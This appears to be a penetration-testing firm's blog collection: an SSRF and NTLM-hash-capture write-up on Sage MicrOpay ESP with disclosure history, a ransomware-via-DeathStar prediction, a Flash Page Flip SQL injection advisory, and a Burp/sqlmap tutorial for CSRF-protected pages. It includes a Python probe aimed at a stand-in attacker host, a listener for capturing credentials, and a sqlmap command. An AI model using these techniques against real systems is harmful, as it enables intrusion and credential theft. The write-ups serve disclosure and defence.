Server-side request forgery in Sage MicrOpay ESP

Asterisk Senior Security Consultant Mike Loss shares a story from a testing engagement that was fun for us, moderately bad news for our client and ultimately worse news for a vendor. Spoiler alert – this story has a happy ending.

During a testing engagement last year I was working on a web app called “Sage MicrOpay ESP”. ESP stands for Employee Self-service Portal, and it’s a pretty standard HR web app, allowing employees to enter timesheets, book leave, etc.

Looking at the first handful of requests made by the browser when loading the page, one stood out immediately as… odd.

https://esp.REDACTED.com.au/ESP/iwContentGen.dll/start?InitialPage=100&NOLOGIN=Y&PageReadOnly=N&MAE=N&HAE=N&CommonDatabase=53227%20EvolutionCommon&CommonServer=REDACTED-SQL02&US=03dbbb66-cf9b-46de-97cb-cfa450de93bf

There are a few file extensions that really set the spidey-sense tingling when it comes to web apps. The list is long, but classics include .pl, .sh, .exe and, in this instance, .dll.


Looking through the URL parameters in the request, something else stood out – the ‘CommonDatabase’ and ‘CommonServer’ parameters. It seemed pretty odd that the user would be in control of a web app’s database connection. At first I doubted that was what was actually happening, but once I noticed that the value in ‘CommonServer’ matched the naming convention of the target organisation’s server fleet, I became more confident that I was on to something.

Put simply, it turns out that one of ESP’s very first actions upon loading was to tell the client’s browser: ‘Hey I need you to tell me to connect to a database server. You should tell me to connect to this one!’.

There’s essentially no reason for a web application of this type to ever ‘ask’ a regular client which database on which server the application should connect to. In any sane application this value would be in a configuration file, somewhere inaccessible to normal users of the application.

So of course I did what any normal tester would do: I threw a bunch of garbage at the interesting parameters to see what would stick.

Most things I tried at first resulted in the request timing out, but we maintain a pet DNS server for just such an occasion. Keeping an eye on the query logs for the server and sending the request again with our DNS name in the ‘CommonServer’ parameter resulted in a lovely sight.
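
For the curious, the probe itself is nothing fancy. Here’s a rough Python sketch of the idea; the ESP hostname and the ‘ssrf-probe.attacker.example’ name are placeholders (the latter standing in for a name served by our pet DNS server), and the other parameters are simply copied from the original request.

```python
import requests

# Sketch of the SSRF probe: replay the app's start request, but point
# CommonServer at a hostname we control and watch our DNS query logs.
params = {
    "InitialPage": "100",
    "NOLOGIN": "Y",
    "PageReadOnly": "N",
    "MAE": "N",
    "HAE": "N",
    "CommonDatabase": "53227 EvolutionCommon",
    "CommonServer": "ssrf-probe.attacker.example",  # placeholder attacker-controlled name
    "US": "03dbbb66-cf9b-46de-97cb-cfa450de93bf",
}
resp = requests.get(
    "https://esp.target.example/ESP/iwContentGen.dll/start",  # placeholder ESP hostname
    params=params,
    timeout=60,
)
print(resp.status_code, len(resp.content))
```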

At the very least we have some kind of server-side request forgery in play. The obvious next step for us was to see what else we could get the server to talk to. Internal hosts? Hosts out on the Internet?

The thing clearly wants to talk to a database server… let’s give it a database server. The .dll file extension tells us it’s on Windows, so MSSQL is an obvious place to start.

Starting up a netcat listener on port 1433 on a host in AWS and then sending our DNS name in the ‘CommonServer’ field generated exactly the result we’d hoped for.
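
If netcat isn’t handy, a rough Python equivalent of that listener looks something like this (1433 being the default MSSQL port, run on an Internet-reachable host):

```python
import socket

# Rough stand-in for the netcat listener: accept one inbound connection
# on the default MSSQL port and dump whatever the client sends.
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("0.0.0.0", 1433))
listener.listen(1)

client, addr = listener.accept()
print("Connection from %s:%d" % addr)
print(client.recv(4096))  # likely a raw TDS pre-login packet if the app speaks MSSQL
client.close()
listener.close()
```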

So we have a web application on the inside… and it thinks I’m its database server…


I wonder if I can get it to send me credentials?

The obvious tool for the job here is Responder. It’ll happily impersonate a server, then negotiate and accept more or less any authentication request that a client is willing to send it, then serve up the resulting credentials on a platter.

After repeating the process with Responder in place of our netcat listener, we get some creds!

Fun for us, but moderately bad news for our client.

At this stage I was moderately disappointed by the quality of the very obviously default creds, especially since they were no good to me in terms of further attacks on the target infrastructure.

I started goofing around with the format of the server address, trying out UNC addresses, internal addresses, specifying ports, that kind of thing, and eventually hit on formatting it like this:

…which made my Responder go off like crazy.


For those not familiar with NTLM authentication, it APPEARS that the application has interpreted our gently mangled server name as a UNC path, in such a way that it thinks it needs to get to the database via SMB.

As a result, it’s connected to my Responder listener on port 445, and Responder has told it to authenticate via NTLM. The application has kindly obliged and we end up with a NetNTLMv2 hash – that long string of yellow alphanumerics at the end of the image.

Now, a NetNTLMv2 hash is quite a lot slower to crack than a regular NTLM hash if you want to actually recover the password, but if you notice that ‘$’ at the end of where I’ve redacted the username? That means the account being used to authenticate is the AD account of the actual server itself. That means the password is randomly generated and LOOOONG.

Never going to crack it. Just not gonna happen.

What we COULD do however is relay the authentication attempt… IF the target organisation had any services facing the internet that used NTLM authentication AND allowed connections from computer accounts. This might seem unlikely at first, but ‘Authenticated Users’ includes computer accounts, and heaps of sysadmins grant rights to ‘Authenticated Users’ where they should really use ‘Domain Users’. In any case, our target organisation didn’t have anything else with NTLM auth facing the Internet so it’s at this point that the attack becomes kind of academic.

In addition to this particularly entertaining issue, we also identified a number of other issues with the application, including unauthenticated access to staff names, phone numbers, addresses, and other sensitive PII.

After delivering the report to our client we began the least fun part – the disclosure to the vendor.

It turns out that ‘Sage’ is a pretty big company, and finding anyone responsible for infosec matters was non-trivial.

I started with the support email on the website. While the staff at the other end responded very quickly, there seemed to be a breakdown in communications.

Sage support continued to insist that I needed to provide a customer number before they would provide me with any support services. I tried explaining that I wasn’t asking for support services…

And then they stopped replying to my emails. 🙁

So I tried the traditional “security@” email address… Not a peep.

I asked around with some industry contacts… Nobody knew anybody who worked at Sage.

Finally I resorted to what I think of as ‘the Tavis’.

Turns out Tavis is a smart guy (who knew, right?) because this worked… real fast.

Without boring you to death with details, I almost immediately received a phone call from an actual dev, who was actually familiar with the app, and who actually wanted to fix the problem!

I passed on the details, they fixed the issues, and a patch came out about a month later.

Finally, because we’re meant to be trying to actually make things better when we hack stuff, I’d like to go over a quick summary of the ways this could have been prevented.

On the dev side, the most obvious part is that the client should never have been given the opportunity to choose the back-end database server. That value should have been set in a config file somewhere.

Of course, we can’t expect vendors and developers to always do the right thing. Strict outbound network filtering would’ve prevented both the MSSQL and NTLM credential exposures. Your computers almost certainly do not need to talk to things on the public Internet on tcp/445 and tcp/1433, so don’t let them!
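
If you want a quick way to check, something along these lines run from an internal workstation will tell you whether those ports can actually reach the Internet (the target hostname is a placeholder for an Internet-facing host you control):

```python
import socket

# Placeholder: an Internet-facing host you control, ideally listening
# on the ports below so a successful connect is unambiguous.
TARGET = "egress-test.example.com"

for port in (445, 1433):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    try:
        s.connect((TARGET, port))
        print("tcp/%d outbound is OPEN - tighten your egress filtering" % port)
    except OSError:
        print("tcp/%d outbound appears blocked (or the target isn't listening)" % port)
    finally:
        s.close()
```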

Sage were very helpful and friendly (and appreciative) once I actually made contact with the right group within the company, but getting there was unnecessarily difficult. Monitor your security@ address and publish a contact on your website for vulnerability disclosure.

 

The End is Nigh?

We are not usually in the business of making bold predictions about future developments in cyber security. But recent internal discussions about WannaCry and Petya/Nyetya have got us all thinking about an entirely plausible and frankly terrifying possibility for where crypto malware could go next.

Here’s the short version:
DeathStar + basic crypto malware variant = complete encryption of the entire AD environment.

DeathStar is an extension to the Empire post-exploitation framework that was released by byt3bl33d3r in May 2017. It builds on previous tools like BloodHound to identify and automate privilege escalation within Active Directory. Basically, “push button, receive domain admin”.

DeathStar (and BloodHound) don’t rely on exploiting any actual vulnerabilities. Rather, DeathStar leverages Active Directory configuration and the allocation of privilege to find and exploit a path through domain-joined systems that can be traversed, one hop at a time, until it eventually obtains DA privileges. The BloodHound GitHub page probably explains this approach most succinctly:
“BloodHound uses graph theory to reveal hidden relationships and attack paths in an Active Directory environment.”

Our predicted scenario plays out something like this:
1. Despite your organisation’s best efforts with security education and awareness, a low privileged user opens a malicious executable email attachment.
2. The attachment first runs DeathStar, which eventually obtains domain admin privileges.
3. Once DA has been obtained, the payload reaches out to every domain-joined Windows system and executes a crypto malware payload, as DA, on every host simultaneously.

Taking this one step further…
Couple this attack with a basic password spraying attack against Remote Desktop Services or Citrix (or even OWA followed up with Ruler) and you remove the need for any phishing or other user interaction. One minute you’re fine – the next minute every machine on your AD has crypto malware.

So what can be done?

  1. Excellent, frequent, offline and offsite backups. Definitely NOT on local, online, domain-joined backup servers.
  2. Proactively test your Active Directory with tools like BloodHound and DeathStar. If you can prevent these tools from achieving DA through derivative administrator relationships, chances are good that the predicted malware won’t be able to either.
  3. Use cloud-based / SaaS services where possible.
  4. Follow ‘best practice’ advice like the Top 35 / Essential 8 provided by ASD. Specifically: patch OS and applications, implement application whitelisting, use 2FA for all remote access (including OWA), limit the allocation of administrative rights, and monitor the shit out of your environment.

If this prediction eventuates it could have staggering consequences for individual organisations and possibly for the global economy. We don’t want this to happen, but it just seems like the next logical step in the evolution of crypto malware. Hopefully by highlighting the possibility we can get ahead of the curve before the risk is realised.

Vulnerability Disclosure: SQL Injection in Flash Page Flip

During an engagement for one of our clients we came across Flash Page Flip and found that it is vulnerable to SQL Injection. As per our responsible disclosure policy, the creators of Flash Page Flip were contacted to advise them of the issue.

90 days have passed since our initial communication, and we have received no further response. SQL injection is not a new topic; to be more precise, it is a 20th century bug that is supposed to be long gone. The reason we decided to pursue this vulnerability officially (CVE-2015-1556 and CVE-2015-1557) is the apparently widespread use of this application.


A lack of input validation was noticed across the majority of Flash Page Flip’s code, affecting multiple pages such as:

  • NewMember.php
  • GetUserData.php
  • SaveUserData.php
  • DeleteUserData.php
  • /xml/Pages.php

In other instances, weak input sanitisation was applied before the SQL query was sent to the backend database; a short sketch of the general pattern follows the list. Some of the affected pages are listed below:

  • /admin/EditSubCat.php
  • /admin/ViewPage.php
  • /admin/AddMag.php
  • /admin/AddCat.php
  • /admin/EditCat.php
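
To illustrate the bug class (this is a hypothetical Python sketch, not the vendor’s PHP code): when a request parameter is concatenated straight into the query string, the parameter value becomes part of the SQL grammar, whereas a parameterised query keeps it as data.

```python
import sqlite3  # illustrative backend only

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER, name TEXT)")
db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])

def get_user_vulnerable(user_id):
    # Vulnerable pattern: the raw parameter lands in the query string, so
    # "1 OR 1=1" (or a UNION-based payload) rewrites the query's meaning.
    return db.execute("SELECT * FROM users WHERE id = " + user_id).fetchall()

def get_user_safe(user_id):
    # Parameterised query: the value is bound, never parsed as SQL.
    return db.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchall()

print(get_user_vulnerable("1 OR 1=1"))  # both rows come back
print(get_user_safe("1 OR 1=1"))        # no rows come back
```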

Exploitation of this vulnerability could allow attackers to extract the data used by Flash Page Flip, which on its own may not be particularly sensitive. However, Flash Page Flip can also be used as a plugin to other CMS platforms and may therefore share their database, as was the case during our engagement. In that situation, SQL injection may result in the exposure of more sensitive CMS data, including credentials.

The full advisory can be found here.

Communication timeline:

  • 27th Jan 2015 – Contacted vendor with initial disclosure
  • 10th Feb 2015 – Contacted vendor with CVE identifiers
  • 29th Apr 2015 – Vulnerability published

Fuzzing and sqlmap inside CSRF-protected locations (Part 2)

– @dave_au

This is part 2 of a post on fuzzing and sqlmap’ing inside web applications with CSRF protection. In part 1 I provided a walkthrough for setting up a Session Handling Rule and macro in Burp Suite for use with Burp’s Intruder. In this part, I will walk through a slightly different scenario where we use Burp as a CSRF-protection-bypass harness for sqlmap.

Sqlmap inside CSRF

A lot of the process from part 1 of the post is common to part 2. I will only run through the key differences.

Again, you’ll need to define a Session Handling Rule, containing a macro sequence that Burp will use to log in to the application and navigate to the page that you need.

The first real difference is in the definition of scope for the session handling rule. Instead of setting the scope to “Intruder” and “Include all URLs”, you’ll need to set the scope to be “Proxy” and a custom scope containing the URL that you are going to be sqlmapping.

screenshot11

There is a note to “use with caution” on the tool selection for Proxy. It is not too hard to see why – if you scoped the rule too loosely for Proxy, each request could trigger a whole new session login. And then I guess the session login could trigger a session login, and then the universe would collapse into itself. Bad news. You have been warned.

Once the session handling rule is in place, find an in-scope request that you made previously, and construct it into a sqlmap command line.

screenshot12

screenshot13

In this example, I’m attempting an injection into a RESTful URL, so I’ve manually specified the injection point with “*”. I’ve included a cookie parameter that defines the required cookies, but the actual values of the cookies are irrelevant, since Burp will replace these based on the macro.
If it was a POST, you would need to include a similar --data parameter to sqlmap, where Burp would replace any CSRF tokens from hidden form fields. Finally, we have specified a proxy for sqlmap to use (Burp).
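
A hypothetical reconstruction of that command line, with a placeholder URL and cookie names, looks roughly like this (shown here via Python’s subprocess; “*” marks the injection point, the cookie values are dummies because Burp rewrites them, and the proxy is Burp’s default listener):

```python
import subprocess

# Hypothetical reconstruction of the sqlmap invocation described above.
# The URL and cookie names are placeholders; "*" marks the injection point
# in the RESTful path, the cookie values are dummies (Burp's session
# handling rule rewrites them), and --proxy points at Burp.
subprocess.run([
    "sqlmap",
    "-u", "https://target.example/app/records/1*/view",
    "--cookie", "ASP.NET_SessionId=dummy; __RequestVerificationToken=dummy",
    "--proxy", "http://127.0.0.1:8080",
    "--batch",
])
```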

Running sqlmap, we start to see it doing its thing in the Burp Proxy window.

Screenshot a

That’s pretty much all there is to it.

One catch for the Session Handling Rule / macro configuration is that there isn’t a lot of evidence in the Burp tool (Intruder, Proxy, …) that anything is happening. If you are not getting the results that you would expect, the first thing to check is the Sessions Tracer, which can be found in the Session Handling Rules section. Clicking the “Open sessions tracer” button opens the Session Handling Tracer window. If a session handling rule is triggered, the actions for that rule will start to show up in the Tracer window. You can step through a macro, request by request, to see that everything is in order.

screenshot b

Conclusion

In this two part post, I’ve walked through setting up Burp Suite to do fuzzing inside CSRF-protected applications, both with Burp’s own Intruder tool and using an external tool (sqlmap).

Fuzzing and sqlmap inside CSRF-protected locations (Part 1)

– @dave_au

Hi all, David here. I was recently testing a web app for a client written in ASP.NET MVC. The developers are pretty switched on, and had used RequestValidation throughout the application in order to prevent CSRF. Further to this, in several locations, if there was a RequestValidation failure, they were destroying the current session and dropping the user back to the login form. Brutal.

I didn’t think that there would be any injection issues in the app, but I needed to test all the same and this presented an interesting challenge – how to fuzz or sqlmap on target parameters within the CSRF-protected pages of the application.

If I opted for a manual approach, the process would look like this:

  1. Login to the application
  2. Navigate to the page under test
  3. Switch Burp proxy to intercept
  4. Submit and intercept the request
  5. Alter the parameter under test in Burp, then release the request
  6. Observe results
  7. Goto 1

This would be incredibly slow and inefficient, and wouldn’t really provide a way of using external tools.

I scratched my head for a while and did some reading on Buby, Burp Extender and Sqlmap tamper scripting until I finally came across an article from Carstein at 128nops which led me to further reading by Dafydd on the Portswigger Web Security Blog. Turns out that Burp suite can do exactly what I needed, out of the box, so I thought I’d put together a step-by-step for how I solved the problem.

Fuzzing (with Intruder) inside CSRF

Note: Intruder has built-in recursive grep functionality that can be used in some circumstances to take the CSRF token from one response and use it in the following request (&c.). This wasn’t much good to me, since the session was being destroyed if CSRF validation failed.

In Burp terminology, you need to create a Session Handling Rule to make Intruder perform a sequence of actions (login, navigate to page under test) before each request.

Go to the “Options” tab, and select the “Sessions” sub-tab. “Session Handling Rules” is right at the top.

screenshot1

Click the “Add” button to create a new Session Handling Rule. The Session Handling Rule editor window opens. Give the rule a meaningful name, then click the “Add” button for “Rule Actions” and select “Run a macro” from the drop-down.

screenshot2

This opens the Session Handling Action Editor window…

screenshot3

In this window, click the “Add” button next to “Select macro:”. This opens the Macro Editor and Macro Recorder windows (shown further on). Now that Burp is set up and waiting to record the sequence, switch over to your web browser. In a new window / session (making sure to delete any leftover session cookies), navigate to the login page, log in, then navigate to the page within the application where you want to be doing fuzz testing. Once you are there, switch back over to Burp. The Macro Recorder should show the intercepted requests.

screenshot4

Select the requests that you want to use in the macro and click “OK”. This will close the Macro Recorder window.

screenshot5

In the Macro Editor window, give the macro a meaningful name and look through the “Cookies received”, “Derived Parameters” and “Preset Parameters” columns to check that Burp has analysed the sequence correctly. When you’re happy, you can test the macro out by clicking the “Test Macro” button. If everything looks alright, click “OK” to close the Macro Editor window.

screenshot6

Almost there.

Back in the Session Handling Action Editor window, you should be OK to leave the other options for updating parameters and cookies as-is. Click “OK” to exit out of here.

Now, back in the Session Handling Rule Editor window, you’ll see your macro listed in the Rule Actions…

screenshot7

Before you close this window, switch over to the “Scope” tab and alter the scope for the rule to be just for Intruder and “Include all URLs”. (If you want to be more specific, you could specify the URL that you wanted the rule to apply to, but I just put it in scope for all of Intruder, and remember to turn the rule off when I’m not using it. This becomes more important in Part 2 of this post.) Then close the Session Handling Rule Editor window.

screenshot8

Your session handling rule is now defined.

Next, go back over to Burp’s proxy and send the request that you want to fuzz over to Intruder in the usual way.

screenshot9

In Intruder’s “Positions” tab, you’ll want to clear all of the injection points except for the one that you want to specifically fuzz test. Session cookies and any CSRF tokens (in cookies or hidden form fields) will be populated automatically by Intruder from the macro sequence.

screenshot10

Set your payloads and other options as required. If the application is sensitive to multiple concurrent sessions for the same user, you will need to reduce the number of threads to 1 in the “Options” tab.

Then start Intruder. You will almost certainly notice that Intruder runs slowly; this is to be expected when you consider that it is going through a new login sequence for each request.

To fuzz different parameters on the same page, just go back into “Positions” and choose the next target.

To fuzz parameters on a different page, you will probably need to go back into your Session Handling Rule and edit your macro (or define a new macro) that logs in and navigates to the new target page.

In part 2 of this post, I’ll step through a slightly different scenario where we use an external tool (sqlmap), proxied through Burp, with a Session Handling rule running on Burp’s Proxy.